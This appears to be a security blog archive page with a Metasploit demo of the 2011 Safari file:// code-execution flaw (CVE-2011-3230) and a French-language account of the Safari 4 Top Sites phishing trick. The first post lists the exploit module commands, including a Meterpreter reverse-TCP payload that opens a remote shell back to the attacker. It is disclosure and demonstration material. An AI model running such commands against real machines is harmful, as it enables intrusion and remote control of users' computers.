Tag Archives: Safari

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

Hijacking Safari 4 Top Sites with Phish Bombs

Inferno de SecureThoughts.com a rapporté une vulnérabilité dans le navigateur Internet Safari 4 de Apple. Cette vulnérabilité assez particulière et unique exploite les fonctionnalitées “Top Sites” et “Cover Flow” introduitent dans Safari 4.

La fonctionnalité “Top Sites” fournit une vue graphique des sites web favoris de l’utilisateur final, permettant ainsi d’accéder rapidement aux sites que l’on accède le plus souvent, comme par exemple eBay, Amazon, Facebook, Gmail, etc.

La vulnérabilité consiste à placer des sites malveillant, par exemple des sites de phishing, dans “Top Sites”, et cette vulnérabilité est exploitable tous simplement en surfant sur Internet, et en cliquant sur un lien malveillant. Un code Javascript basic sera alors exécuté dans une petite fenêtre afin de simuler des navigations répétées sur ces sites web malveillant afin que ceux-ci apparaissent comme populaires. La fenêtre en cause est totalement invisible par le biais de la fonction javascript “window.blur” et l’utilisateur final n’a aucune connaissance de l’attaque en cours.

L’exploit est vraiment basic et il est vraiment regrettable que Apple ne prenne pas la peine d’étudier et de tester au préalable toutes les éventuelles vulnérabilités de ces nouvelles fonctionnalités ou produits. Apple, stp, ne devient pas comme Adobe sad.gif

[youtube iQuUTz1XAZw]